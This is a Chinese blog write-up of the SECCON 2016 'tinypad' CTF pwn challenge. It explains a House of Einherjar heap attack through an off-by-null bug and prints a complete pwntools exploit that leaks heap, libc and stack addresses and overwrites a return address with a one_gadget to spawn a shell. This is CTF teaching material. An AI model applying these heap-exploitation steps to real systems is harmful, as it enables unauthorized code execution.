house-of-einherjar-tinypad

最新推荐文章于 2023-11-20 19:37:00 发布
最新推荐文章于 2023-11-20 19:37:00 发布
阅读量424 收藏 2
点赞数
分类专栏: pwn题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/122588006
版权

题目 : secconctf2016_tinypad

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gAWNgpg1-1642591135200)(house-of-einherjar(tinypad)].assets/image-20220119154650784.png)

分析

add部分:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnx4qtgC-1642591135202)(house-of-einherjar(tinypad)].assets/image-20220119154823873.png)

edit部分:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pQ6buMt1-1642591135202)(house-of-einherjar(tinypad)].assets/image-20220119154907216.png)

dele部分:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WyxrNPSN-1642591135203)(house-of-einherjar(tinypad)].assets/image-20220119154942892.png)

自带的show部分:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XWryFkXR-1642591135203)(house-of-einherjar(tinypad)].assets/image-20220119155030653.png)

其中堆块信息保存在tinypad[0x100]处理解图如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nLEgGfo8-1642591135204)(house-of-einherjar(tinypad)].assets/image-20220119155938736.png)

思路

上面ida分析的注释中对应解释了程序漏洞所在,那么首先进行libc泄露,首先malloc 4个chunk其中

chunkA :
  1. 必须为unsort bin
  2. 且size必须是8(十六进制)结尾,因为如果malloc 0xe8 ----真实大小—> 0xf0
  3. 这时可以写入的数据为0xe8 通过off-by-one则可以溢出到next_chunk的P标志位.如果malloc 0xe0 -----真实大小---->0xf0 但只能写入0xe0的数据,导致无法溢出
chunkB :
  1. chunkA 和 chunkB用于house of einherjar ,并间隔chunkA,chunkC防止发生合并
  2. chunkB必须为0xf0或者0xf8的大小这样chunkA溢出null字节就不会改变大小,只会改变它的P标志位
chunkC :
  1. 用于泄露heap地址,以便后续计算topchunk到目标地址处的偏移
chunkD :
  1. 用于防止topchunk合并,使chunkC正确的放入unsort bin
#------------leak--------------
add(0xe8,'A')
add(0xf0,'B')  
add(0x100,'C') 
add(0x10,'P') 

ru('INDEX: 1')
ru('CONTENT: ')
heap = uu64(rc(4)) - 0x1f0
success('heap',heap)
ru('INDEX: 3')
ru('CONTENT: ')
libc_base = uu64(rc(6)) - (0x7fb46aa46b78-0x7fb46a683000)
success('libc',libc_base)

进行house of einherjar攻击

#------------attack topchunk----------------
dele(4)#使topchunk合并到chunkB后面 形成house of einher jar标准结构
offset = heap+0xf0-tinypad #topchunk合并chunkB后根据prev_size的大小进行合并的距离
add(0xe8,b'A'*0xe0 +p64(offset)) #通过泄露的堆地址获得和tinypad的偏移 #重新分配到chunkA,并写入数据到chunkB的prev_size
fake = p64(0) + p64(offset) + p64(tinypad)*4
edit(1,fake)  #在目标地址处伪造fakechunk 从而绕过检查
dele(2)   #unlink

此时堆空间图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FhUtiiMA-1642591135205)(house-of-einherjar(tinypad)].assets/image-20220119190918045.png)

因为程序用不了got表修改,那么就可以通过泄露environ (environ变量是一个char** 类型,存储着系统的环境变量)可以通过它来获取libc_start_main的地址,然后修改它为one_gadget在程序最后退出时就会调用getshell

#------------leak stack----------------
add(0xe0,'P'*0x100)  #填充tinypad[0xf0]
environ = libc_base + libc.symbols['__environ']
payload =  p64(1) + p64(environ) + p64(1) + p64(tinypad+0x108)
add(0xe0,payload) #控制tinypad指针领域
ru('INDEX: 1')
ru('CONTENT: ')
libc_start_main = uu64(rc(6))-0xf0 #偏移0xf0就是libc_start_main地址

此时ptr空间图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BvzYXhGH-1642591135205)(house-of-einherjar(tinypad)].assets/image-20220119191440190.png)

最后修改指针就可以getshell了

#------------getshell----------------
edit(2,p64(libc_start_main))
edit(1,p64(libc_base + one[5]))
sla('(CMD)>>>','Q')

修改后的栈空间图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FDCKTTjb-1642591135206)(house-of-einherjar(tinypad)].assets/image-20220119191633598.png)

完整exp:

# -*-coding:utf-8 -*
from pwn import *
import sys

context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./tinypad"

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("111.200.241.244","58782")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
u64Leakbase = lambda offset :u64(ru("\x7f")[-6: ] + b'\0\0') - offset
u32Leakbase = lambda offset :u32(ru("\xf7")[-4: ]) - offset
it = lambda :p.interactive()


def z(s='b main'):
 gdb.attach(p,s)

def success(string,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,addr))

def pa(s='暂停!'):
  log.success('当前执行步骤 -> '+str(s))
  pause()
one = [0x45206,0x4525a,0xcc673,0xcc748,0xefa00,0xf0897,0xf5e40,0xef9f4] #2.23
#one = [0x45226,0x4527a,0xcd173,0xcd248,0xf03a4,0xf03b0,0xf1247,0xf67f0]
#idx = int(sys.argv[1])

def add(size,data):
    sla('(CMD)>>>','A')
    sla('(SIZE)>>>',str(size))
    sla('(CONTENT)>>>',data)
def edit(size,data,flag='Y'):
    sla('(CMD)>>>','E')
    sla('(INDEX)>>>',str(size))
    sla('(CONTENT)>>>',data)
    sla('(Y/n)>>>',flag)
def dele(size):
    sla('(CMD)>>>','D')
    sla('(INDEX)>>>',str(size))

tinypad = 0x602040
#------------leak--------------
add(0xe8,'A')
#必须为unsort bin
#且size必须是8(十六进制)结尾,因为如果malloc 0xe8 ----真实大小---> 0xf0
#这时可以写入的数据为0xe8 通过off-by-one则可以溢出到next_chunk的P标志位
#如果malloc 0xe0 -----真实大小---->0xf0  但只能写入0xe0的数据,导致无法溢出
add(0xf0,'B')  #chunkA 和 chunkB用于house of einherjar ,并间隔chunkA,chunkC防止发生合并
#chunkB必须为0xf0或者0xf8这样chunkA溢出null字节就不会改变大小,只会改变它的P标志位
add(0x100,'C')  #用于泄露heap地址,以便下面计算topchunk到目标地址处的偏移
add(0x10,'P')  #用于防止topchunk合并,使chunkC正确的放入unsort bin
dele(3) #先free chunkC再chunkA,不然会获取不到值
dele(1) #泄露libc
ru('INDEX: 1')
ru('CONTENT: ')
heap = uu64(rc(4)) - 0x1f0
success('heap',heap)
ru('INDEX: 3')
ru('CONTENT: ')
libc_base = uu64(rc(6)) - (0x7fb46aa46b78-0x7fb46a683000)
success('libc',libc_base)
#------------attack topchunk----------------
dele(4)#使topchunk合并到chunkB后面 形成house of einher jar标准结构
offset = heap+0xf0-tinypad
add(0xe8,b'A'*0xe0 +p64(offset)) #通过泄露的堆地址获得与tinypad的偏移 ,
                                 #重新分配到chunkA,并写入chunkB的prev_size
fake = p64(0) + p64(offset) + p64(tinypad)*4
edit(1,fake)  #在目标地址处伪造fakechunk 从而绕过检查
dele(2)   #unlink
#------------leak stack----------------
add(0xe0,'P'*0x100)  #填充tinypad[0xf0]
environ = libc_base + libc.symbols['__environ']
#environ 变量是一个char** 类型,存储着系统的环境变量
#可以通过它来获取libc_start_main的地址,然后修改它为one_gadget
payload =  p64(1) + p64(environ) + p64(1) + p64(tinypad+0x108)
add(0xe0,payload) #控制tinypad指针领域
ru('INDEX: 1')
ru('CONTENT: ')
libc_start_main = uu64(rc(6))-0xf0
#------------getshell----------------
edit(2,p64(libc_start_main))
edit(1,p64(libc_base + one[5]))
sla('(CMD)>>>','Q')
#------------end----------------
it()
HNHuangJingYu
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
heap-exploitation.pdf
02-01
- **House of Einherjar**:一种复杂的利用方法,涉及多个内存块的精细控制。 #### 安全编码指导原则 - **避免使用不安全的函数**:例如使用`strdup`替代`strcpy`等。 - **验证输入数据**:确保所有外部输入都经过...
Einherjar.rebootstrap:PowerPC Mac的操作系统
02-04
Einherjar.rebootstrap是一款专为PowerPC架构的Mac电脑设计的操作系统项目。PowerPC是IBM、Motorola和Apple联合开发的一种高性能处理器架构,曾在20世纪90年代末至21世纪初被广泛应用于Apple的Macintosh计算机。随着...
House of Einherjar
qq_45595732的博客
12-03 321
House of Einherjar 原理 free中后向合并的操作(unlink),如果我们可以同时控制一个 chunk prev_size 与 PREV_INUSE 字段,那么我们就可以将新的 chunk 指向几乎任何位置。 free时合并的操作 static void _int_free (mstate av, mchunkptr p, int have_lock) { ... /* consolidate backward */ if (!prev_inuse(p)) {
House of einherjar
tbsqigongzi的博客
07-31 464
释放堆块时,unlink后向合并堆块,强制使得malloc返回一个几乎任意地址的chunk。free函数中的后向合并核心操作如下后向合并时,新的chunk的位置取决于chunk_at_offset(p,-((long)prevsize))
15.house_of_einherjar
06-10 292
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <string.h> 4 #include <stdint.h> 5 #include <malloc.h> 6 7 /* 8 Credit to st4...
Tinypad Seccon CTF 2016(House Of Einherjar)
Bill
04-18 1262
Tinypad Seccon CTF 2016(House Of Einherjar) 序言 随着对how2heap的学习, 难度也是越来越大, 改革进入了深水区. 程序运行 1.菜单 | [A] Add memo | | [D] Delet...
Einherjar:用于amd64和PowerPC Mac的colorForth计算环境
02-03
$ cd Einherjar/kernel $ make all 步骤3:使用qemu运行(通过使用4Mb的RAM和生成的ISO映像) $ qemu-system-i386 -m 4 -cdrom ../build/roentgenium.iso 步骤4:如果需要,请清理构建 $ make clean
Einherjar.tmp:PowerPC Mac的操作系统
05-24
艾因哈尔(Einherjar)-ᛖᛁᚾᚺᛖᚱᛃᚨᚱ PowerPC Mac的操作系统。 曾经有鼓舞人心的 如果没有将它们传递给您,请进行一次时差旅行或购买一些东西。 但是,如果不能,请使用qemu进行测试。 地位 该OS项目基于...
Heap Exploitation(简体中文)1
08-03
- House of Spirit、House of Lore、House of Force、House of Einherjar:是经典的堆利用技术,涉及堆内存的精确控制和操纵,以实现任意代码执行。 0x6 安全编码指南: 这部分内容可能包含如何避免上述漏洞的编码...
House Of Einherjar
最新发布
qq_61670993的博客
11-20 127
house of Einherjar
House Of Einherjar(2016 Seccon tinypad)
九层台
09-02 1017
栗子https://github.com/tower111/software.git got表不可写:劫持程序执行流的思路1.复写hook函数。2.覆盖返回地址 canary和NX保护。 漏洞和数据结构 if ( v13 &gt; 0 &amp;&amp; v13 &lt;= 4 ) { if ( *(_QWORD *)&amp;tinypad[16 *...
《CTF竞赛权威指南》|house of einherjar
qq_50883855的博客
11-22 770
house of einherjar
[house of einherjar] tinypad
huzai9527的博客
05-27 158
[house of einherjar] tinypad 1. Ida 分析 程序直接显示chunk中的内容,相当于show了 delete存在uaf edit函数,tinypad缓冲区读入数据 add函数,只能申请4个chunk,使用read_until读入 read_until存在off by null 2. 思路 条件总结,存在可编辑的数组,存在off by null,chunk中的数据没法轻易的修改(strcpy \x00截断了),可以使用house of ein
2016 Seccon tinypad
yms0211的博客
09-26 416
house of Einherjar练习题
魔兽世界编程宝典读书笔记(8)
默然说话
12-07 3044
<br /> 第8章             魔兽世界编程概述现在该在游戏中创建对你自己有意义的插件了。本章将介绍独立程序运行环境和魔兽世界客户端内部运行环境之间的区别,向您指出Blizzard提供的资源和资料,并介绍许多当您创建自己的插件时很有用的插件。8.1        游戏中运行和测试代码在魔兽世界里运行代码与在游戏的外面运行代码有很大不同,尤其是print()函数在游戏里并不存在,这是由于在游戏里面没有Lua解释程序来输出给定的文本。你可以借助WowLua插件进行修正,或者你也可以自己定义一个pr
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1647
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
how2heap学习笔记
weixin_30394251的博客
10-11 1081
github源代码地址 这里只分析glibc2.25堆分配的特性,为了方便调试编译时使用 gcc -g -no-pie <input_file_name> -o <output_file_name> 0.fastbin_dup_consolidate   glibc在分配一个large chunk时会先检查是否存在fastbins,如果存在则合并fastbi...
深入理解堆内存与 heap 漏洞利用
5. House of Spirit、House of Lore、House of Force和House of Einherjar:这些都是堆溢出攻击的经典技术,通过不同的手段来操控堆内存,达到代码执行或权限提升的目的。 最后,书中提到了安全编码指南,旨在帮助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值